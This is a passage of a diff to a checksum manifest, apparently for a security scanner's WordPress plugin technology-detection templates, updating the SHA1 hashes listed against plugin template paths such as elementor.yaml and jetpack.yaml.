+http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:2f4191d85def3372a337d94ae5861a8115cb23bc -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:b3d19da6b40dbc6cce091855147759494cd00b28 -http/technologies/wordpress/plugins/elementor.yaml:05a9bdcb3407095e85d4b1ad9d608837923a5bf6 -http/technologies/wordpress/plugins/elementskit-lite.yaml:7abbbef94bfbbe2b0adffe962c07d74fd0269958 -http/technologies/wordpress/plugins/enable-media-replace.yaml:2a606900ac2d7a3b05734922c725faddf038e502 -http/technologies/wordpress/plugins/envato-elements.yaml:2ef60bfb54c15bc7e95a90ae63daee615655c705 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:8b7fc9117973aac607546ef0330cf2948936251d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:46d992667493f32a2be8406e24a1686127da0e52 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:72dd39f9e7321fa95f797e99d8d454f94a808e12 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:2e416e815ae52d031e891dfeb688b74df3301d2f -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:1eb3cc20b7b96d2259296e3243fa79724c59afff -http/technologies/wordpress/plugins/flamingo.yaml:42423fd02ba8b4cab2d7d6229ac3360d8469c104 -http/technologies/wordpress/plugins/fluent-smtp.yaml:ad1efca62f442299f5c057b98a64be2210c6c6a9 -http/technologies/wordpress/plugins/fluentform.yaml:ad1ee30f2ef32c57f933b10614b300e8f1e841d7 -http/technologies/wordpress/plugins/font-awesome.yaml:b53b527d87dd1fe08dcf413e797feec5e0c1fbc5 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:58bc95338550da669150ae6f25d77d0dceb61f20 -http/technologies/wordpress/plugins/formidable.yaml:8a5421f42996bfa2d2cb0698411ab6759c725a8b -http/technologies/wordpress/plugins/forminator.yaml:e246f18f4d33b52c50562beed5cf0f8ca7e4cb02 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:ede122b1bd450af9b34e9bff287df5a46b736ac5 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:54cb054b07dda468c52fdec71396e4ff4f1b0287 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:526cdbb05d11ca5a931a0ebf9c93b8d081b97638 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:18604a5039ce963583ee21b3f93716f53e6c2c3a -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:25b1a3fb80b2880a067b64303fb288be3bb4f346 -http/technologies/wordpress/plugins/google-site-kit.yaml:a65a4084476190cfc2ea0598f9c677c6125f1c18 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:87346d861ec627c2a55cfe48f3e5f2341df96011 -http/technologies/wordpress/plugins/gtranslate.yaml:ed3bab52fa5501b74a6d9dbaf12d852b21f2bafc -http/technologies/wordpress/plugins/gutenberg.yaml:7f4ad7ab2e78f4f00ba136c993e1d2d96016451f -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:6d6a3b38be394b70e4d506f25e4eab6603ad4529 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:3f61b31357d71ff8135352214354e138905b6c04 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0791c4846fac9d47698a4b379d5eb15d6852392c -http/technologies/wordpress/plugins/header-footer.yaml:68a714a375e2621deed4aad96b0c708ca3343444 -http/technologies/wordpress/plugins/health-check.yaml:0ae5ca762c298f069b9bb2bdf1cf3b311cead065 -http/technologies/wordpress/plugins/hello-dolly.yaml:ff27aaa1800c4f62f91d6ae647848adf0c178e16 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:4f057c8a837ce68c5ce3c74b05b14b97ca1c7b7c -http/technologies/wordpress/plugins/hostinger.yaml:ffa027c23a264c89c3adadfa5a88285114bd9d4b -http/technologies/wordpress/plugins/image-optimization.yaml:3fd8babe9ed1df1d609d0d4722b82f10305d2960 -http/technologies/wordpress/plugins/imagify.yaml:ceacdb4cbda669133fcd9277596f2efec852fdfd -http/technologies/wordpress/plugins/imsanity.yaml:999b682b34c20cc087d7610e5e9d5ad293414e9f -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:59cdc4ace262bf0f53f188302a03537a60156272 -http/technologies/wordpress/plugins/instagram-feed.yaml:9394ffec6751c8bc069f050acfe1f3f13d68a791 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a3a66fd790cd01f53f85d808b18b05778951cc25 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:aa50d5d2cf10f2040c9992a2c9e0d54468c7773d +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:3d57b0b3d81cdccf9655c87e57a2822287a40bc6 -http/technologies/wordpress/plugins/jetpack.yaml:001c51a3b7f0cbcf962789ba2576e4a829551e28 -http/technologies/wordpress/plugins/kadence-blocks.yaml:91c12d3168eac9366358dcf07245431a5f3ce41f -http/technologies/wordpress/plugins/kirki.yaml:eca1577ea8851a5f06877706deb834bd68f78da9 -http/technologies/wordpress/plugins/leadin.yaml:537d8956ea86e0318f18b1063a4c588999e3186e -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:946648d4025a08e1f73154ab4c814fd3ffc3c850 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:ffbac99a7a635200773e5c43fa375a0e12a29269 -http/technologies/wordpress/plugins/litespeed-cache.yaml:b72a1f53cd951947d27bfa0818cf4a2e89dc9c3a -http/technologies/wordpress/plugins/loco-translate.yaml:ef7c5c53c5626eaabe43ae6f2e8e0dbc6810c4f6 -http/technologies/wordpress/plugins/loginizer.yaml:0df9dc2572c3ce76203fc9d9966f08364b4ef2dc +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:5f053acf6d6521095e9f7631e5f702e45affaa90 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:e5a5cdf48f4307d331b118be891e45479f349417 -http/technologies/wordpress/plugins/mailpoet.yaml:753861efe97a36e9a5827c8fd54e08ec902dbf20 -http/technologies/wordpress/plugins/maintenance.yaml:62744232e34cad573671acba365fff23b60876e5 -http/technologies/wordpress/plugins/mainwp-child.yaml:da81d399185d1b5fb2b6d3bc7cd73f2517b241c4 -http/technologies/wordpress/plugins/malcare-security.yaml:1e933ae244a2274ace681689ebda71178714a4b3 -http/technologies/wordpress/plugins/megamenu.yaml:20aa11ada222d3ee831159cdd80c42364c793454 -http/technologies/wordpress/plugins/members.yaml:4897025884858497eca448e219fe0737ddd72098 -http/technologies/wordpress/plugins/meta-box.yaml:4b902ab494266decc7035612b68c55463227c19f -http/technologies/wordpress/plugins/metform.yaml:6c92ccfc341597820bd1712208175faddb78885a -http/technologies/wordpress/plugins/ml-slider.yaml:97571fdaf78d182de106a2c9181623c2e14018ba -http/technologies/wordpress/plugins/newsletter.yaml:29a2e79a26218010b885531d271920ebdf56801d -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:aa1f2ec430af10adfa3f69071ec1c88ccb82d9f9 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:da61599dd26a67b70d76224b4c5b19db6b3fcedf -http/technologies/wordpress/plugins/ninja-forms.yaml:dacb2f3a39dcf54fd71840832aba067bab456c17 -http/technologies/wordpress/plugins/ocean-extra.yaml:1d83abdd19199e67fb8ac6449a7a4befd7bddf09 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:40324c0c8ae0833bcc0e48d808efddc812d635b5 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:a2428347d7094ba62ae980b950972e1526174fae -http/technologies/wordpress/plugins/optinmonster.yaml:6b6b4fb1f912635d53544cbc4b59700202bcfe7e -http/technologies/wordpress/plugins/otter-blocks.yaml:20b361aa8a4dc0bf138e85b5203008d743711946 -http/technologies/wordpress/plugins/password-protected.yaml:946682b8b765c61f0816bf6f50f1c469316cf659 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b565b028b13eead5eaa05caf8d5d0dba49fd6949 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c24640887fe102fbb33e5531a4cd1c08730de2dd -http/technologies/wordpress/plugins/pixelyoursite.yaml:f6c0f3f75c1159441adde7ffc5ab61613e34de4e -http/technologies/wordpress/plugins/polylang.yaml:4c3352a3b214dec14ac1c7d6a27b1ac94957de6a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:528a440b98b7ca4f540e70f24788a2d947466a3a -http/technologies/wordpress/plugins/post-smtp.yaml:b7a58df5ccc70367ff79f12d475809e214661f9d -http/technologies/wordpress/plugins/post-types-order.yaml:bcfe70e19813e33b23eedd3ab0758617e8866719 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:7b541582bd62b9c3003aa612ff51fcbbcdfbe42f -http/technologies/wordpress/plugins/pretty-link.yaml:d1f96f1b1308d7f3f08a4e332251836a70242449 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:746f248e52a3a6098ab960f832bbdf73f270a59a -http/technologies/wordpress/plugins/really-simple-ssl.yaml:9407562693ed14a71f57a38a4bb6dff5f24fe9a7 -http/technologies/wordpress/plugins/redirection.yaml:0f50441ff128f2f2b5edc903d093dbe4728d2a6c -http/technologies/wordpress/plugins/redux-framework.yaml:34f72e5aa77705f73bbb9e438d12a7cdc41df85d -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:e847a20f4a7765e674b832b5ceb8977d061e9720 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:238ed01d2e11c3c7e2dd7706acd403ad4cb40cfd -http/technologies/wordpress/plugins/safe-svg.yaml:c4d915a22ce4878ce1ac617729a7568e9f7155d5 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3b8c102e6f1e7d125c6ae3fc4698a3f752cbfaa6 -http/technologies/wordpress/plugins/sg-cachepress.yaml:53262bb6b6067fc4acfd0db926dc0ecb05d42ecc -http/technologies/wordpress/plugins/sg-security.yaml:e95ab128f93eedaa3b4b14271538fdf0648ef7a6 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:f39e7d110d87da1f3ff0e7c26c699b3e9155ee15 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:1af4ce8af134212a6855d921e3c907914175db43 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:14edf7dd17213dc22b9a53d53184ccb047195f6a +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:c159316fd62e81a1757b5b919a49b5f744977113 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a4015148fa4e3ebb09aa2236c8e32467b91dc4e6 -http/technologies/wordpress/plugins/smart-slider-3.yaml:c5ddf967cdf5f90d80029db400d86f0d1bd27dbe -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:79d22df9d7f1101b03ce02c0c180c319e274aca1 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:43497b0e7d3209b528a58251b30c1598f0caa467 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:c54ec80d0aa869578ad10ea2bc3e10d75c9bbc34 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:affe137d33ef7a8dbde96bde6a994147429e4d9f +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:b53f7f695fde21424f06492b9a9cf58d1335bb87 -http/technologies/wordpress/plugins/tablepress.yaml:91f6f4e12381150941961a814305eb33bf12b79b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:3af7f1030c05a03604a83795ea3c8e5d1100f3e5 -http/technologies/wordpress/plugins/templately.yaml:8713f5b8419ea3c206fba728509b90a5ad7e7902 -http/technologies/wordpress/plugins/the-events-calendar.yaml:cb71cf41e03f2a74d0070269ebd3b41c4f62094c +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:80dae4a97ca8131b99ccb03e0fe194b479583c26 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:1303246e5183622832d550b9ff3323a393d5b0bc -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:1731539957eeb576d119822e81da4e968bcbf9a3 -http/technologies/wordpress/plugins/under-construction-page.yaml:03b80383063d1b4411f3f1cc8e7b6a137b6e2b9f +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:32de9c2afb8245195ce8187172491ca9684fb908 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:cad6e6a91ac010cd17fd1e35b1d578d56ca0e9ce +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:a0d5115e66bfa2d6dbf81090be624b4a64d73242 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:01ebdfafca132781255a6f6ec81f60382b81b9e1 -http/technologies/wordpress/plugins/webp-express.yaml:f5d13542cc139ec830aeff13e5c077929aacc80d -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:95d23d0849a642b22f87871a85d63a752a5cee0a -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:ddba317f2af879f6ad0e027d27da6655b9cbd4af -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:24b77fd6ed91430118f0cb310838227012711666 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:6b2311a3f1ae8dcea5872d86304f28d2a546ba67 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c1ea61a4e402721ef33b27308961a4087ed41d83 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:2173a4f2ec01e5fa6bd7b225795f3cc35ca2e1dc -http/technologies/wordpress/plugins/woocommerce-payments.yaml:b0f832a88e02ec946efedc142ee731db347a26cc 